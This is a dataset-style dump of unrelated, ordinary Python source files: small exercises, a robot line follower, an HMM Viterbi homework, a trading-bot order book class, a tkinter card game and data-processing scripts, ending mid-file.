text stringlengths 8 6.05M |
|---|
# program that reads in a string and outputs how long it is.
inpStr = input('Please enter a string: ')
print ('The length of the string is {} characters'.format(len(inpStr)))
#program creating and out putting a string
string = 'John said\t"hi"\nI said\t\t"bye"'
print (string) |
import sys
import psycopg2
from helper import connect_database, process_file, table_stats
if __name__ == "__main__":
if len(sys.argv) == 8:
# parse command line inputs
dbname, user, pwd, host_ip, port, table, filepath = sys.argv[1:]
# connect to database
cur, conn = connect_database(dbname, user, pwd, host_ip, port)
# load data
process_file(cur, conn, table, filepath=filepath)
print('*****PostgreSQL****')
table_stats(cur, table)
print('*******************')
cur.close()
conn.close()
else:
print("Please check your inputs!") |
import requests
url = 'http://192.168.2.133:8000/api/products'
x = requests.get(url).json()
print(x)
def func1(data):
from math import inf
max_price_title = None
min_price_title = None
min_price = inf
max_price = 0
for value in x:
price = value['price']
if price > max_price:
max_price = price
max_price_title = value['title']
elif 0 < price < min_price:
min_price = price
min_price_title = value['title']
print(max_price_title,max_price, min_price_title, min_price)
print(func1(x))
d1 = {
'title': 'bakyt',
'image' : 'None',
'price': 200000000
}
a = requests.post(url,d1)
|
import numpy as np
import pandas as pd
def winsorize(data, **kwargs):
query = ""
for name, value in kwargs.items():
assert (type(value) is tuple and value[1] > value[0]), "winsorization lb and ub should be a tuple (lb,ub)"
lb = np.percentile(data[name], value[0])
ub = np.percentile(data[name], value[1])
query += f" {name}>{lb} and {name}<{ub} and"
return data.query(query[:-3]) # drop the last "and" from the query
|
from selenium import webdriver
import unittest,time
class GetElementTitleByChrome(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
#隐式等待
self.driver.implicitly_wait(10)
def test_getElementTitle(self):
url = "http://www.baidu.com"
self.driver.get(url)
#定位百度首页“新闻”即id属性值为"ul"的div元素下的第一个链接元素,class='mnav'
firstElement = self.driver.find_element_by_xpath("//*[@class='mnav'][1]")
#通过找到链接元素对象的text属性获取到链接元素的文本内容
first_text = firstElement.text
self.assertEqual(first_text, "新闻", "不是该文本内容")
def tearDown(self):
#退出浏览器
self.driver.quit()
if __name__ == '__main__':
unittest.main()
|
import cozmo
import cv2
import numpy as np
import logging
import asyncio
import sys
import PIL.ImageTk
import tkinter as tk
from threading import Timer
from scipy.interpolate import UnivariateSpline
from cozmo.util import degrees, distance_mm, speed_mmps
# Logger
log = logging.getLogger('ok.FollowLine')
# global variables #sorry fuer den murks...
lastSpeedR = 0 #last wheelspeed before track loss r
lastSpeedL = 0 #last wheelspeed before track loss l
billigCounter = 0 #watchdog counter
billigTimeout = 30 #watchdog timout (counter-watchdog)
# klassen
class Watchdog:
def __init__(self, timeout, userHandler=None): # timeout in seconds
self.timeout = timeout
self.handler = userHandler if userHandler is not None else self.defaultHandler
self.timer = Timer(self.timeout, self.handler)
self.timer.start()
def reset(self):
self.timer.cancel()
self.timer = Timer(self.timeout, self.handler)
self.timer.start()
log.info('reseted watchdog timer')
def stop(self):
self.timer.cancel()
def defaultHandler(self):
raise self
class Main:
def __init__(self):
# Set-up logging
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)-8s %(message)s')
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
log.setLevel(logging.INFO)
log.addHandler(handler)
# variables
self.endProgramm = False;
self._robot = None
self._tk_root = 0
self._tk_label_input = 0
self._tk_label_output = 0
cozmo.connect(self.run)
self._robot.add_event_handler(cozmo.world.EvtNewCameraImage, self.on_img)
def myHandler(self):
print("watchdog timer expired")
#self.endProgramm = True;
def on_img(self, event, *, image: cozmo.world.CameraImage, **kw):
raw_img = image.raw_image
raw_rgb = np.array(raw_img)
r, g, b = cv2.split(raw_rgb)
hsv_img = cv2.cvtColor(np.array(raw_img), cv2.COLOR_RGB2HSV)
h, s, v = cv2.split(hsv_img)
mer_img = cv2.merge((h, s, v))
hsv_img = mer_img
rgb_img2 = cv2.cvtColor(hsv_img, cv2.COLOR_HSV2RGB)
rgb_img3 = rgb_img2
# watchdog timer object
#watchdog = Watchdog(pathTimeout, self.myHandler())
try:
#used global variables (write access needed)
global billigCounter
global lastSpeedR
global lastSpeedL
#while True:
# Crop the image
Slices = 10
crop_img = self.CropImage(rgb_img3, Slices)
#cv2.imwrite('CropImage.png', crop_img)
# Convert to grayscale
gray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)
# Gaussian blur
blur = cv2.GaussianBlur(gray, (5, 5), 0)
# Color thresholding
ret, thresh1 = cv2.threshold(blur, 60, 255, cv2.THRESH_BINARY_INV)
#cv2.imwrite('ThresholdImageWithAccidentalDetections.png', thresh1)
# Erode and dilate to remove accidental line detections
mask = cv2.erode(thresh1, None, iterations=9)
mask = cv2.dilate(mask, None, iterations=9)
_, contours, hierarchy = cv2.findContours(mask.copy(), 1, cv2.CHAIN_APPROX_NONE)
# Find the biggest contour (if detected)
if len(contours) > 0:
c = max(contours, key=cv2.contourArea)
M = cv2.moments(c)
cx = int(M['m10'] / M['m00'])
cy = int(M['m01'] / M['m00'])
cv2.line(crop_img, (cx, 0), (cx, 720), (255, 0, 0), 1)
cv2.line(crop_img, (0, cy), (1280, cy), (255, 0, 0), 1)
cv2.drawContours(crop_img, contours, -1, (0, 255, 0), 1)
maxWindow = 312 #maximalwert von cx
mid = 156 #wenn linie genau mittig, dann cx=mid
#sqr = (cx-156)*(cx-165)
#speedFactor = 0.005*sqr + 2
speedFactor = 4.8 #speed in mm/s = mid/speedfactor -> kleinerer faktor, hoeherer speed
# 5=gut 4=mit kurvenspeed anpassung moeglich 3=zu schnell
#TODO: nice-to-have exponentielle radgeschwindigkeiten bei kurven, nicht linear
#sqrtestformel = int(((0-0.00005)*((cx-156)*(cx-156))+1)*1000)
#if int(sqrtestformel) < 0:
# sqrtestformel = 0
#log.info('1Formel: ' + str(sqrtestformel))
#drive. linear wheelspeed, depending on cx value
speed = int(mid / speedFactor)
speed_l = ((cx-mid)/speedFactor)+int(speed)
speed_r = ((mid-cx)/speedFactor)+int(speed)
lastSpeedL=speed_l
lastSpeedR=speed_r
log.info('cx: ' + str(cx) + ' | speed l: ' + str(speed_l) + ' | speed r: ' + str(speed_r))
self._robot.drive_wheel_motors(int(speed_l), int(speed_r))
billigCounter = 0
else:
log.info('nothing to see here, continuing last known bending')
log.info('last speed l: ' + str(lastSpeedL) + ' | last speed r: ' + str(lastSpeedR))
#verringere kurvenradius durch proportionales abbremsen des inneren rades
#if lastSpeedR > lastSpeedL:
# diff = int(lastSpeedR)-int(lastSpeedL)
# self._robot.drive_wheel_motors(int(int(lastSpeedL)-diff), int(lastSpeedR))
#if lastSpeedR < lastSpeedL:
# diff = int(lastSpeedL)-int(lastSpeedR)
# self._robot.drive_wheel_motors(int(lastSpeedL), int(int(lastSpeedR)-diff))
billigCounter = int(billigCounter)+1
if billigCounter >= billigTimeout:
sys.exit(0)
#millis = int(round(time.time() * 1000))
#cv2.imwrite(str(millis) + '.png', crop_img)
PilImageForTk = PIL.Image.fromarray(crop_img)
display_image = PIL.ImageTk.PhotoImage(image=PilImageForTk)
self._tk_label_input.imgtk = display_image
self._tk_label_input.configure(image=display_image)
self._tk_root.update()
finally:
# Clean up the connection
cv2.destroyAllWindows()
def CropImage(self, inputImage, Slices):
images = []
for i in range(Slices):
images.append(inputImage)
height, width = inputImage.shape[:2]
sl = int(height / Slices)
for i in range(Slices):
part = sl * i
crop_img = inputImage[part:part + sl, 0:width]
images[i] = crop_img
ImagePart = self.ConnectImages(images, 1, 5)
return ImagePart
def ConnectImages(self, images, start, end):
imgstart = len(images) - 1 - start
imgend = len(images) - 1 - end
img = images[imgend]
#cv2. imwrite('CropImagePart0.png', img)
for i in range(1, int(end - start + 1)):
img = np.concatenate((img, images[imgend + i]), axis=0)
#cv2. imwrite('CropImagePart' + str(i) + '.png', img)
return img
def create_LUT_8UC1(self, x, y):
spl = UnivariateSpline(x, y)
return spl(range(256))
async def set_up_cozmo(self, coz_conn):
# TODO: setzt die Parameter für Cozmo (Funktioniert, kann aber nützlich zum nachschauen von Sachen für das "Kopf hoch"-Problem sein, deshalb TODO)
asyncio.set_event_loop(coz_conn._loop)
self._robot = await coz_conn.wait_for_robot()
self._robot.camera.image_stream_enabled = True
self._robot.camera.color_image_enabled = True
await self._robot.set_head_angle(cozmo.robot.MIN_HEAD_ANGLE).wait_for_completed()
self._robot.set_lift_height(1.0).wait_for_completed()
self._robot.add_event_handler(cozmo.world.EvtNewCameraImage, self.on_img)
async def run(self, coz_conn):
await self.set_up_cozmo(coz_conn)
self._tk_root = tk.Tk()
self._tk_label_input = tk.Label(self._tk_root)
self._tk_label_input.pack()
while True:
await asyncio.sleep(0)
if __name__ == '__main__':
Main() |
#!/usr/bin/python3
import sys
import random
from math import log
import numpy as np
from operator import itemgetter
#Iused this resource to understand the logic: https://en.wikipedia.org/wiki/Viterbi_algorithm
#####################################################
#####################################################
# Please enter the number of hours you spent on this
# assignment here
num_hours_i_spent_on_this_assignment = 30
#####################################################
#####################################################
#####################################################
#####################################################
# Give one short piece of feedback about the course so far. What
# have you found most interesting? Is there a topic that you had trouble
# understanding? Are there any changes that could improve the value of the
# course to you? (We will anonymize these before reading them.)
# <Your feedback goes here>
#I had to look up online to understand viterbi algorithm properly
#I was not able to attend last few lectures due to my health and there areno slides on viterbi algorithm online
#####################################################
#####################################################
# Outputs a random integer, according to a multinomial
# distribution specified by probs.
def rand_multinomial(probs):
# Make sure probs sum to 1
assert(abs(sum(probs) - 1.0) < 1e-5)
rand = random.random()
for index, prob in enumerate(probs):
if rand < prob:
return index
else:
rand -= prob
return 0
# Outputs a random key, according to a (key,prob)
# iterator. For a probability dictionary
# d = {"A": 0.9, "C": 0.1}
# call using rand_multinomial_iter(d.items())
def rand_multinomial_iter(iterator):
rand = random.random()
for key, prob in iterator:
if rand < prob:
return key
else:
rand -= prob
return 0
class HMM():
def __init__(self):
self.num_states = 2
self.prior = [0.5, 0.5]
self.transition = [[0.999, 0.001], [0.01, 0.99]]
self.emission = [{"A": 0.291, "T": 0.291, "C": 0.209, "G": 0.209},
{"A": 0.169, "T": 0.169, "C": 0.331, "G": 0.331}]
# Generates a sequence of states and characters from
# the HMM model.
# - length: Length of output sequence
def sample(self, length):
sequence = []
states = []
rand = random.random()
cur_state = rand_multinomial(self.prior)
for i in range(length):
states.append(cur_state)
char = rand_multinomial_iter(self.emission[cur_state].items())
sequence.append(char)
cur_state = rand_multinomial(self.transition[cur_state])
return sequence, states
# Generates a emission sequence given a sequence of states
def generate_sequence(self, states):
sequence = []
for state in states:
char = rand_multinomial_iter(self.emission[state].items())
sequence.append(char)
return sequence
# Computes the (natural) log probability of sequence given a sequence of states.
def logprob(self, sequence, states):
#We will enumerate the set of states and calculate the probability of sequence
#For each state, transition and emission probability will be computed
#To take the log of probability, we will follow formula: log(ab) = log(a) + log(b)
prob =0
for index, val in enumerate(states):
if index == 0:
prob = log(self.emission[val][sequence[index]]) + log(self.prior[index])
elif index == 1:
probability = log(self.transition[states[0]][val]) + log(self.emission[val][sequence[index]])
prob = prob+probability
elif index>1:
probability = log(self.transition[states[index-1]][val]) + log(self.emission[val][sequence[index]])
prob = prob+probability
return prob
# Outputs the most likely sequence of states given an emission sequence
# - sequence: String with characters [A,C,T,G]
# return: list of state indices, e.g. [0,0,0,1,1,0,0,...]
def viterbi(self, sequence):
#make a list of dict as a table for viterbi algorithm
viterbiTable=[{}]
lenSequence = len(sequence)
states=[0,1] #since we know 2 states are given, so it is 0 and 1
for i in states:
#print("index", idx, "value", val)
#calculating the sum of probabilties in every state
viterbiTable[0][i]={"probability":log(self.prior[i])+log(self.emission[i][sequence[0]]),"prevState":0}
for index in range(1,lenSequence):
viterbiTable.append({})
for st in states:
#will have probailty and prevState keys in the dictionary
#to keep track of the present proabilty and backpointers that we used to save the state
probMax=max(viterbiTable[index-1][s1]["probability"]+log(self.transition[s1][st]) for s1 in states)
for s1 in states:
if viterbiTable[index-1][s1]["probability"]+log(self.transition[s1][st])==probMax:
probMax=probMax+log(self.emission[st][sequence[index]])
viterbiTable[index][st]={"probability":probMax,"prevState":s1}
break
#listStateIndices=[]
listStateIndices=[]
#for item in viterbiTable[-1].values():
ListofAllProb = list(value["probability"] for value in viterbiTable[-1].values())
max_prob = max(ListofAllProb)
#max_prob = max(map(itemgetter("probability"), viterbiTable))
#max_prob = max(prob)
lstate = 0
for state, prob in viterbiTable[-1].items():
if prob["probability"] == max_prob:
listStateIndices.append(state)
break
lstate = state
tableLength = len(viterbiTable)
for t in range(tableLength-2, -1, -1):
Tablevalue = viterbiTable[t + 1][lstate]["prevState"]
listStateIndices.append(Tablevalue)
lstate = viterbiTable[t + 1][lstate]["prevState"]
counter0= listStateIndices.count(0)
counter1 = listStateIndices.count(1)
#print ("line1",self.logprob(sequence, listStateIndices))
#print ("zeroesss: ", counter0)
#print ("Onesssss: ", counter1)
#print(listStateIndices)
return listStateIndices
def read_sequence(filename):
with open(filename, "r") as f:
return f.read().strip()
def write_sequence(filename, sequence):
with open(filename, "w") as f:
f.write("".join(sequence))
def write_output(filename, logprob, states):
with open(filename, "w") as f:
f.write(str(logprob))
f.write("\n")
for state in range(2):
f.write(str(states.count(state)))
f.write("\n")
f.write("".join(map(str, states)))
f.write("\n")
hmm = HMM()
file = sys.argv[1]
sequence = read_sequence(file)
viterbi = hmm.viterbi(sequence)
logprob = hmm.logprob(sequence, viterbi)
name = "my_"+file[:-4]+'_output.txt'
write_output(name, logprob, viterbi)
|
#!/usr/bin/python
import random
import sys
def main():
# TODO don't remove!
seed = int(sys.argv[1])
random.seed(seed)
# TODO test generation
t = int(sys.argv[2])
n = int(sys.argv[3])
print t
for _ in range(t):
print n
for i in range(n):
print random.randint(1, 10**9),
print
for i in range(1, n):
print i + 1, 1 + random.randint(0, i - 1)
main()
|
#!/usr/bin/env python
from decimal import Decimal
from aiokafka import ConsumerRecord
import bz2
import logging
from sqlalchemy.engine import RowProxy
from typing import (
Any,
Optional,
Dict
)
import ujson
from hummingbot.logger import HummingbotLogger
from hummingbot.core.event.events import TradeType
from hummingbot.core.data_type.order_book cimport OrderBook
from hummingbot.core.data_type.order_book_message import OrderBookMessage, OrderBookMessageType
from hummingbot.connector.exchange.huobi.huobi_utils import convert_from_exchange_trading_pair
_hob_logger = None
cdef class HuobiOrderBook(OrderBook):
@classmethod
def logger(cls) -> HummingbotLogger:
global _hob_logger
if _hob_logger is None:
_hob_logger = logging.getLogger(__name__)
return _hob_logger
@classmethod
def snapshot_message_from_exchange(cls,
msg: Dict[str, Any],
timestamp: Optional[float] = None,
metadata: Optional[Dict] = None) -> OrderBookMessage:
if metadata:
msg.update(metadata)
msg_ts = int(msg["ts"] * 1e-3)
content = {
"trading_pair": convert_from_exchange_trading_pair(msg["trading_pair"]),
"update_id": msg_ts,
"bids": msg["tick"]["bids"],
"asks": msg["tick"]["asks"]
}
return OrderBookMessage(OrderBookMessageType.SNAPSHOT, content, timestamp or msg_ts)
@classmethod
def trade_message_from_exchange(cls,
msg: Dict[str, Any],
timestamp: Optional[float] = None,
metadata: Optional[Dict] = None) -> OrderBookMessage:
if metadata:
msg.update(metadata)
msg_ts = int(msg["ts"] * 1e-3)
content = {
"trading_pair": convert_from_exchange_trading_pair(msg["trading_pair"]),
"trade_type": float(TradeType.SELL.value) if msg["direction"] == "buy" else float(TradeType.BUY.value),
"trade_id": msg["id"],
"update_id": msg_ts,
"amount": msg["amount"],
"price": msg["price"]
}
return OrderBookMessage(OrderBookMessageType.DIFF, content, timestamp or msg_ts)
@classmethod
def diff_message_from_exchange(cls,
msg: Dict[str, Any],
timestamp: Optional[float] = None,
metadata: Optional[Dict] = None) -> OrderBookMessage:
if metadata:
msg.update(metadata)
msg_ts = int(msg["ts"] * 1e-3)
content = {
"trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
"update_id": msg_ts,
"bids": msg["tick"]["bids"],
"asks": msg["tick"]["asks"]
}
return OrderBookMessage(OrderBookMessageType.DIFF, content, timestamp or msg_ts)
@classmethod
def snapshot_message_from_db(cls, record: RowProxy, metadata: Optional[Dict] = None) -> OrderBookMessage:
ts = record["timestamp"]
msg = record["json"] if type(record["json"])==dict else ujson.loads(record["json"])
if metadata:
msg.update(metadata)
return OrderBookMessage(OrderBookMessageType.SNAPSHOT, {
"trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
"update_id": int(ts),
"bids": msg["tick"]["bids"],
"asks": msg["tick"]["asks"]
}, timestamp=ts * 1e-3)
@classmethod
def diff_message_from_db(cls, record: RowProxy, metadata: Optional[Dict] = None) -> OrderBookMessage:
ts = record["timestamp"]
msg = record["json"] if type(record["json"])==dict else ujson.loads(record["json"])
if metadata:
msg.update(metadata)
return OrderBookMessage(OrderBookMessageType.DIFF, {
"trading_pair": convert_from_exchange_trading_pair(msg["s"]),
"update_id": int(ts),
"bids": msg["b"],
"asks": msg["a"]
}, timestamp=ts * 1e-3)
@classmethod
def snapshot_message_from_kafka(cls, record: ConsumerRecord, metadata: Optional[Dict] = None) -> OrderBookMessage:
ts = record.timestamp
msg = ujson.loads(record.value.decode())
if metadata:
msg.update(metadata)
return OrderBookMessage(OrderBookMessageType.SNAPSHOT, {
"trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
"update_id": ts,
"bids": msg["tick"]["bids"],
"asks": msg["tick"]["asks"]
}, timestamp=ts * 1e-3)
@classmethod
def diff_message_from_kafka(cls, record: ConsumerRecord, metadata: Optional[Dict] = None) -> OrderBookMessage:
decompressed = bz2.decompress(record.value)
msg = ujson.loads(decompressed)
ts = record.timestamp
if metadata:
msg.update(metadata)
return OrderBookMessage(OrderBookMessageType.DIFF, {
"trading_pair": convert_from_exchange_trading_pair(msg["s"]),
"update_id": ts,
"bids": msg["bids"],
"asks": msg["asks"]
}, timestamp=ts * 1e-3)
@classmethod
def trade_message_from_db(cls, record: RowProxy, metadata: Optional[Dict] = None):
msg = record["json"]
ts = record.timestamp
data = msg["tick"]["data"][0]
if metadata:
msg.update(metadata)
return OrderBookMessage(OrderBookMessageType.TRADE, {
"trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
"trade_type": float(TradeType.BUY.value) if data["direction"] == "sell" else float(TradeType.SELL.value),
"trade_id": ts,
"update_id": ts,
"price": data["price"],
"amount": data["amount"]
}, timestamp=ts * 1e-3)
@classmethod
def from_snapshot(cls, msg: OrderBookMessage) -> "OrderBook":
retval = HuobiOrderBook()
retval.apply_snapshot(msg.bids, msg.asks, msg.update_id)
return retval
|
from tkinter import *
from model.nethandler.battle_net_client import BattleNetClient
from model.nethandler.battle_net_server import BattleNetServer
from views.image_factory import ImageFactory
class GameFrame(Frame):
def __init__(self, master):
Frame.__init__(self, master, bg='darkblue')
# self.master.wm_attributes('-transparentcolor', 'lime')
self.nb_players = 2
self.can_draw = True
self.can_pick_mine = False
self.can_pick_all = False
self.on_par = False
self.in_battle = False
self.game_ended = False
self.battle_stage = [0, 0, 0, 0]
self.players = []
self._coords_x = [150, 390, 520, 650]
self._coords_y = [75, 100, 285]
self._sheet = Canvas(self, bg="darkblue", border=3, highlightbackground='lightblue')
self._sheet.place(relx=0.025, rely=0.05, anchor=NW, bordermode=INSIDE, relwidth=0.95, relheight=0.65)
# ===== DECK =====
self._deck = Label(self, bg="darkblue")
self._deck.image = ImageFactory.instance.get_deck()
self._deck.config(image=self._deck.image)
self._deck.place(relx=0.25, rely=1, anchor=S)
# ===== DEFAUSSE =====
self._defausse = Label(self, bg="darkblue")
self._defausse.place(relx=0.65, rely=1, anchor=CENTER)
# ===== PLAYERS NAMES =====
self._players_names = []
for i in range(4):
self._players_names.append(Label(self, fg="white", bg="darkblue"))
self._players_names[i].place(x=self._coords_x[i], y=self._coords_y[0], anchor=NW)
# ===== CARDS =====
self._cards = []
for i in range(12):
self._cards.append(Label(self, bg="darkblue", borderwidth=0))
self._cards[i].place(x=self._coords_x[i % 4], y=self._coords_y[1] + int(i / 4) * 20, anchor=NW)
self._cards[i].bind('<ButtonRelease-1>', self.card_picked)
self._cards[i].bind('<B1-Motion>', self.drag_card)
self._cards[i].card = None
# ===== MESSAGES =====
self._messages = []
for i in range(4):
self._messages.append(Label(self, fg="gold", bg="darkblue"))
self._messages[i].place(x=self._coords_x[i], y=self._coords_y[2], anchor=NW)
# ===== SCORES =====
self._scores = []
for i in range(4):
self._scores.append(Label(self, fg="gold", bg="darkblue"))
self._scores[i].place(y=i * 25, relx=0.975, rely=0.75, anchor=NE)
# ===== TOP CARD =====
self._top_card = Label(self, bg="darkblue", borderwidth=0)
self._top_card.image = ImageFactory.instance.get_back()
self._top_card.config(image=self._top_card.image)
self._top_card.place(relx=0.25, rely=1, anchor=CENTER)
self._top_card.bind('<ButtonRelease-1>', self.card_drawed)
self._top_card.bind('<B1-Motion>', self.drag_card)
def init(self):
self.players.clear()
# ===== RÉCUPÉRATION DES NOMS POUR UN SERVEUR =====
if isinstance(self.master.handler, BattleNetServer):
self.players.append(self.master.handler.name)
for agent in self.master.handler.players:
self.players.append(agent.agent_name)
# ===== RÉCUPÉRATION DES NOMS POUR UN CLIENT =====
elif isinstance(self.master.handler, BattleNetClient):
self.players.append(self.master.handler.name)
self.players.extend(self.master.handler.players_names)
# ===== REDEFINITIONS DES CALLBACKS DE BATTLE =====
def on_new_turn():
print('== New turn!')
self.new_turn()
self.refresh_scores()
def on_card_drawn(player_name, card):
if player_name:
print(player_name + ' drawed ' + str(card))
index_player = self.players.index(player_name)
else:
print('I drawed ' + str(card))
index_player = 0
index = index_player + self.battle_stage[index_player] * 4
self.battle_stage[index_player] += 1
if (not self.master.handler.no_card_upside_down) and (int(index / 4) == 1):
image = ImageFactory.instance.get_back()
else:
image = ImageFactory.instance.get(card)
self.update_card_img(index, image)
self._cards[index].card = card
def on_battle(in_battle, other_members_names):
print('== Battle!')
if in_battle:
self.can_draw = True
self.in_battle = True
self.replace_top_card()
self.battle_stage[0] = 1
self._messages[0]['text'] = "BATAILLE !"
for i in range(1, self.nb_players):
if self.players[i] in other_members_names:
self.battle_stage[i] = 1
self._messages[i]['text'] = "BATAILLE !"
def on_turn_finished(winner_name):
if winner_name:
print('== ' + winner_name + ' wins this turn!')
index = self.players.index(winner_name)
else:
print('== I win this turn!')
index = 0
self.can_pick_all = True
self.can_draw = False
self.in_battle = False
self.battle_stage = [0, 0, 0, 0]
for label in self._messages:
label['text'] = ''
self._messages[index]['text'] = "GAGNÉ !"
self.hide_top_card()
def on_turn_par():
print("== Turn par!")
self.on_par = True
self.can_pick_mine = True
self.in_battle = False
self.battle_stage = [0, 0, 0, 0]
self._messages[0]['text'] = "ÉGALITÉ"
self.hide_top_card()
def on_player_picked_card(card):
for i in range(12):
label_card = self._cards[i]
if label_card.card and label_card.card == card:
label_card.image = None
label_card.lower()
break
def on_game_ended():
print("== No more card for me")
self.game_ended = True
self._top_card.place_forget()
self._deck.place_forget()
def on_game_won(winner_name):
print('== ' + winner_name + ' WINS THE GAME!')
self.master.winners.append(winner_name)
self.master.raise_frame('scores')
def on_game_par(winners_names):
winners = ''
for name in winners_names:
winners += name + " "
print('== ' + winners + 'WIN THE GAME!')
self.master.winners = winners_names
self.master.raise_frame('scores')
self.master.battle.on_new_turn = on_new_turn
self.master.battle.on_card_drawn = on_card_drawn
self.master.battle.on_battle = on_battle
self.master.battle.on_turn_finished = on_turn_finished
self.master.battle.on_turn_par = on_turn_par
self.master.battle.on_player_picked_card = on_player_picked_card
self.master.battle.on_game_ended = on_game_ended
self.master.battle.on_game_won = on_game_won
self.master.battle.on_game_par = on_game_par
self.nb_players = len(self.players)
for i in range(self.nb_players):
self._players_names[i]['text'] = self.players[i] + (' (moi)' if (i == 0) else '')
self.new_turn()
self.refresh_scores()
# ===== FONCTIONS UTILES =====
def refresh_scores(self):
my_points = self.master.battle.my_points()
others_points = self.master.battle.others_points()
for i in range(0, self.nb_players):
self._scores[i]['text'] = "{} : {} pts".format(self.players[i], my_points if (i == 0) else others_points[self.players[i]])
def update_card_img(self, index, new_img):
card = self._cards[index]
card.image = new_img
card.config(image=new_img)
card.lift()
def drag_card(self, evt):
def dragging(card):
x, y = self.winfo_pointerx() - self.master.winfo_rootx(), self.winfo_pointery() - self.master.winfo_rooty()
card.place(x=x, y=y, relx=0, rely=0, anchor=CENTER)
card.lift()
return
if self.can_draw and not self.game_ended:
if evt.widget == self._top_card:
dragging(evt.widget)
if self.can_pick_mine:
index = self._cards.index(evt.widget)
if index % 4 == 0:
dragging(evt.widget)
if self.can_pick_all:
if evt.widget in self._cards:
dragging(evt.widget)
def card_drawed(self, evt):
if self.can_draw:
self.can_draw = self.in_battle
self.master.battle.draw_card()
if self.in_battle:
self.replace_top_card()
else:
self.hide_top_card()
def card_picked(self, evt):
if self.can_pick_all:
self.master.battle.pick_card(evt.widget.card)
self.replace_card_in_sheet(evt.widget)
if self.can_pick_mine:
index = self._cards.index(evt.widget)
if index % 4 == 0:
self.master.battle.pick_card(evt.widget.card)
self.replace_card_in_sheet(evt.widget)
def new_turn(self):
self.can_draw = True
self.can_pick_all = False
self.can_pick_mine = False
self.in_battle = False
for i in range(self.nb_players):
self._messages[i]['text'] = ''
self.update_card_img(0, ImageFactory.instance.get_border())
self.replace_top_card()
def replace_card_in_sheet(self, card):
if not self.on_par:
self._defausse.image = ImageFactory.instance.get(card.card)
self._defausse.config(image=self._defausse.image)
i = self._cards.index(card)
x, y = self._coords_x[i % 4], self._coords_y[1] + int(i / 4) * 20
card.place(x=x, y=y, anchor=NW)
card.image = None
card.lower()
def replace_top_card(self):
if self.game_ended:
self.hide_top_card()
else:
self._top_card.place(relx=0.25, rely=1, x=0, y=0, anchor=CENTER)
def hide_top_card(self):
self._top_card.place(relx=0.25, rely=1, x=0, y=0, anchor=N) |
import rlp
from eth2.beacon.sedes import (
uint24,
uint64,
)
from eth2.beacon.typing import (
SlotNumber,
ShardNumber,
ValidatorIndex,
)
class ShardReassignmentRecord(rlp.Serializable):
"""
Note: using RLP until we have standardized serialization format.
"""
fields = [
# Which validator to reassign
('validator_index', uint24),
# To which shard
('shard', uint64),
# When
('slot', uint64),
]
def __init__(self,
validator_index: ValidatorIndex,
shard: ShardNumber,
slot: SlotNumber)-> None:
super().__init__(
validator_index=validator_index,
shard=shard,
slot=slot,
)
|
import os
import numpy as np
# collecting all csv files from forwarded directory
def collect_csv_data_collection_from_directory(path):
import pandas as pd
import os
data_collection = []
for csv_name in os.listdir(path):
csv_path = os.path.join(path, csv_name)
data_collection.append(pd.read_csv(csv_path))
return data_collection
# filtering collected data
def filter_collected_data(data_collection):
filtered_important_data_collection = []
for data in data_collection:
# collecting only important rows (time and AOI labels)
important_data = data[['TIME', 'AOI']].values
important_data_without_nan = clear_nan_values(important_data)
first_time_concatenated_data = concatenate_rows_with_same_successive_aoi(important_data_without_nan)
# second concatenating needs to be done because as result of first time concatenating (which removes rows with
# less than 200 ms time spent on aoi field) can cause another successive repetition of rows with same aoi
second_time_concatenated_data = concatenate_rows_adding_time_with_same_successive_aoi(
first_time_concatenated_data)
filtered_important_data_collection.append(second_time_concatenated_data)
return filtered_important_data_collection
# clearing NaN values from the begin and the end of data sequence
def clear_nan_values(data):
# clearing Nan values from front of the data sequence
found_first_aoi = False
data_cleared_from_front = []
for row in data:
if isinstance(row[1], float):
if found_first_aoi:
data_cleared_from_front.append(([row[0], "prazno"]))
else:
found_first_aoi = True
data_cleared_from_front.append(([row[0], row[1]]))
# clearing NaN values from the end of the sequence
found_last_aoi = False
reversed_cleared_data = []
for i in range(len(data_cleared_from_front) - 1, 0, -1):
if isinstance(data_cleared_from_front[i][1], float):
if found_last_aoi:
reversed_cleared_data.append(([data_cleared_from_front[i][0], data_cleared_from_front[i][1]]))
else:
found_last_aoi = True
reversed_cleared_data.append(([data_cleared_from_front[i][0], data_cleared_from_front[i][1]]))
cleared_data = list(reversed(reversed_cleared_data))
return cleared_data
# concatenating time spent on successive AOI fields in data sequence and removing ones with time spent less than 200ms
def concatenate_rows_with_same_successive_aoi(data):
import numpy as np
concatenated_data = []
current_aoi = ''
aoi_first_time_seen = 0.0
for row in data:
if current_aoi == row[1]:
continue
else:
# Clearing rows which have time spent on less than 200ms
if row[0] - aoi_first_time_seen > 0.20:
concatenated_data.append([row[0] - aoi_first_time_seen, current_aoi])
current_aoi = row[1]
aoi_first_time_seen = row[0]
# last AOI that is left to append to sequence
concatenated_data.append([data[len(data) - 1][0] - aoi_first_time_seen, current_aoi])
return concatenated_data
# concatenating time spent on successive AOI fields (based on adding time between them, not calculating time spent)
# in data sequence
def concatenate_rows_adding_time_with_same_successive_aoi(data):
import numpy as np
concatenated_data = []
current_aoi = ''
time_spent_on_aoi = 0.0
for row in data:
if current_aoi == row[1]:
time_spent_on_aoi += row[0]
continue
else:
concatenated_data.append([time_spent_on_aoi, current_aoi])
current_aoi = row[1]
time_spent_on_aoi = row[0]
# last AOI that is left to append to sequence
concatenated_data.append([time_spent_on_aoi, current_aoi])
concatenated_data = np.array(concatenated_data)
return concatenated_data
# saving csv files into forwarded path
def save_data_as_csv(data, path):
import csv
import os
filename = os.path.join(path + ".csv")
with open(filename, "w") as f:
writer = csv.writer(f)
writer.writerows(data)
# MAIN
collected_data = collect_csv_data_collection_from_directory("../collected_data")
filtered_data = filter_collected_data(collected_data)
for i in range(0, len(filtered_data)):
save_data_as_csv(filtered_data[i],
"../filtered_colected_data/" + str(i))
|
import pandas as pd
import seaborn as sn
import matplotlib.pyplot as plt
from utils.loader import *
import numpy as np
from sklearn.metrics import confusion_matrix
from sklearn.metrics import f1_score,fbeta_score
# from models import joint_cnn
from utils.transform import test_transform
from models.modules import JLNet
from functools import partial
class test(object):
